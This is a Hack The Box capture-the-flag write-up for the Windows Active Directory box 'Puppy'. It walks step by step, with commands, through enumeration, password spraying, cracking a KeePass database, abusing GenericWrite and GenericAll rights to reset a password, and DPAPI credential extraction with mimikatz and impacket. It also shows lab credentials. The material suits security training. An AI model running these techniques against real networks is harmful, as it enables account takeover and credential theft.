HTB | Puppy
This is a Windows box. You can find it here
IP - 10.10.11.70
MACHINE INFORMATION - As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
Nmap
└─$ nmap -sT -p- --min-rate 10000 10.10.11.70 -Pn -oA nmap_ports
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-05-18 11:40 IST
Nmap scan report for 10.10.11.70
Host is up (0.25s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2049/tcp open nfs
3260/tcp open iscsi
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
55152/tcp open unknown
55178/tcp open unknown
55214/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 38.32 seconds└─$ nmap -sC -sV -p 53,88,111,135,139,389,445,464,593,636,2049,3260,3268,3269,5985,9389,49664,49669,49670,55152,55178,55214 10.10.11.70 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-05-18 11:45 IST
Nmap scan report for 10.10.11.70
Host is up (0.26s latency).
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 13:16:03Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
55152/tcp open msrpc Microsoft Windows RPC
55178/tcp open msrpc Microsoft Windows RPC
55214/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-18T13:17:57
|_ start_date: N/A
|_clock-skew: 7h00m03s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 312.85 secondsLDAP
└─$ ldapsearch -H ldap://10.10.11.70 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=PUPPY,DC=HTB
namingcontexts: CN=Configuration,DC=PUPPY,DC=HTB
namingcontexts: CN=Schema,CN=Configuration,DC=PUPPY,DC=HTB
namingcontexts: DC=DomainDnsZones,DC=PUPPY,DC=HTB
namingcontexts: DC=ForestDnsZones,DC=PUPPY,DC=HTB
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
From the above, we can confirm the DC name puppy.htb
Since we have credentials , we can use LDAP query
//to get all the user info
ldapsearch -H ldap://10.10.11.70 -x -b "DC=PUPPY,DC=HTB" -D "levi.james@puppy.htb" -w 'KingofAkron2025!' "(objectClass=user)"Now we can copy the list of users
ldapsearch -H ldap://10.10.11.70 -x -b "DC=PUPPY,DC=HTB" -D "levi.james@puppy.htb" -w 'KingofAkron2025!' "(objectClass=user)" sAMAccountName└─$ cat users.txt
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_admLet’s use netexe to see if anyone is using levi’s password
└─$ netexec smb 10.10.11.70 -u users.txt -p 'KingofAkron2025!' --continue-on-success
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\\ant.edwards:KingofAkron2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\\adam.silver:KingofAkron2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\\jamie.williams:KingofAkron2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\\steph.cooper:KingofAkron2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\\steph.cooper_adm:KingofAkron2025! STATUS_LOGON_FAILURE So no one is using Levi’s password
Bloodhound
Since we have the credentials for the user, Let's use bloodhound-python for further enumeration
└─$ bloodhound-python -u levi.james -p 'KingofAkron2025!' -d puppy.htb -ns 10.10.11.70 -c All
Foothold/ shell
shell as adma.silver
GenericWrite
On analyzing bloodhound i can see LEVI.JAMES@PUPPY.HTB → MemberOf → HR@PUPPY.HTB → GenericWrite → DEVELOPERS@PUPPY.HTB We can exploit this to escalate privileges by adding Levi to the DEVELOPERS@puppy.htb group using the GenericWrite permission.
I have added levi to developers group
└─$ net rpc group addmem "Developers" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.10.11.70now levi have read access to DEV share
└─$ netexec smb 10.10.11.70 -u users.txt -p 'KingofAkron2025!' --shares
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC [*] Enumerated shares
SMB 10.10.11.70 445 DC Share Permissions Remark
SMB 10.10.11.70 445 DC ----- ----------- ------
SMB 10.10.11.70 445 DC ADMIN$ Remote Admin
SMB 10.10.11.70 445 DC C$ Default share
SMB 10.10.11.70 445 DC DEV READ DEV-SHARE for PUPPY-DEVS
SMB 10.10.11.70 445 DC IPC$ READ Remote IPC
SMB 10.10.11.70 445 DC NETLOGON READ Logon server share
SMB 10.10.11.70 445 DC SYSVOL READ Logon server share keepass DB
Now we can list directory in DEV
└─$ smbmap -H 10.10.11.70 -u levi.james -p 'KingofAkron2025!' -r 'DEV' --dir-only
└─$ smbclient //10.10.11.70/DEV -U levi.jamesWe found krecovery.kdbx
Let’s download the file
smb: \\> mget recovery.kdbx
└─$ file recovery.kdbx
recovery.kdbx: Keepass password database 2.x KDBXSince this version of keepass is not supported by johntheripper we will use keepass4brute
We have found the password
└─$ ./keepass4brute.sh ../recovery.kdbx /home/anurag/stuff/rockyou.txt
Let’s sue this password to open the recovery.kbdx
and we now have the clear text password for adam , anthony, jamie, samuel, steve
samuel and steve was not found earlier so i will add them in our user list
We will use kerbrute to check the valid username and password
└─$ ./kerbrute bruteforce --dc 10.10.11.70 -d puppy.htb creds.txt -vand we got the hit for ant.edwards
GenericAll
On analyzing bloodhound i can see ANT.EDWARDS@PUPPY.HTB → MemberOf → SENIOR DEVS@PUPPY.HTB → GenericAll → ADAM.SILVER@PUPPY.HTB
This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.
So we can change USER LOCKED OUT to unlock for the user adman.silver
We will use bloodAD for this
└─$ bloodyAD --host 10.10.11.70 -u ant.edwards -p '<PASSWORD>' remove uac adam.silver -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
Since adam user was disable we need to reassign the password
└─$ net rpc password "adam.silver" 'P@ssw0rd@123' -U "puppy.htb"/"ant.edwards"%'Antman2025!' -S 10.10.11.70
or
└─$ bloodyAD --host 10.10.11.70 -u ant.edwards -p '<PASSWORD>' set password adam.silver 'P@ssword!'
[+] Password changed successfully!Now we can login
Now its time to login
└─$ evil-winrm -i 10.129.244.42 -u adam.silver -p 'P@ssword!'
found user.txt
Privilege Escalation
Shell as Steph.cooper
Backup folder
found Backup folder in C:\\
found site-backup-2024-12-30.zip , let’s download it and unzip
found nms-auth-config.xml.bak in which we found cred for steph.cooper
and we are in as steph.cooper
Shell as steph.cooper_adm
Saved credential - DPAI
We can see Microsoft Edge.lnk on the Desktop
Which would indicate usage of Microsoft Edge with a potentially saved password.
The system level cred are stored by DPAPI here
gci -force AppData\\Roaming\\Microsoft\\Credentials
the master key for these are stored here
gci -force AppData\\Roaming\\Microsoft\\Protect
Decrypt Credential — Decrypt Master Key
There are two method
via mimikatz
via impacket-dpapi
Via Mimikatz
The challenge is that the master key is encrypted with the user’s password, and I don’t have it. Fortunately, there’s a blog post from SpecterOps that shows how to decrypt without the password, using an RPC called MS-BKRP (BackupKey Remote Protocol). To abuse this I’ll use the /rpc flag in Mimikatz.
Let's upload mimikatz to the box
Now we have to get the key
*Evil-WinRM* PS C:\\Users\\steph.cooper> .\\mimikatz.exe "dpapi::masterkey /in:C:\\Users\\steph.cooper\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1487982659-1829050783-2281216199-1107\\556a2412-1275-4ccf-b721-e6a0b4f90407 /rpc" exit
we have the key at the end. Now Let's try this key on the credential
.\\mimikatz.exe "dpapi::cred /in:C:\\Users\\steph.cooper\\AppData\\Roaming\\Microsoft\\Credentials\\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" exit
Now we have the credential for steph.cooper_adm
Via impacket-dpapi
We will convert the credential file into base64 so that we can transfer it to our machine (or we can simply download the file since we have evil-winrm)
gci -force AppData\\Roaming\\Microsoft\\Credentials
*Evil-WinRM* PS C:\\Users\\steph.cooper\\AppData\\Roaming\\Microsoft\\Credentials> [System.Convert]::ToBase64String((Get-Content C8D69EBE9A43E9DEBF6B5FBD48B521B9 -Encoding byte))
Decode it and write it on our machine.
echo "<BASE64 blob>" base64 -d > C8D69EBE9A43E9DEBF6B5FBD48B521B9We will transfer the master key in similar manner
*Evil-WinRM* PS C:\\Users\\steph.cooper\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1487982659-1829050783-2281216199-1107> [System.Convert]::ToBase64String((Get-Content 556a2412-1275-4ccf-b721-e6a0b4f90407 -Encoding byte))
echo "<BASE64 BLOB> | base64 -d > 556a2412-1275-4ccf-b721-e6a0b4f90407Now let’s use impacket-dapi to get the key
└─$ impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password '<STEPH.COOPER PASSWORD>'
Now let’s use this key to get the credential
└─$ impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key <KEY>
Since we have credentials of steph.cooper_adm we can login
and we got root.txt
Last updated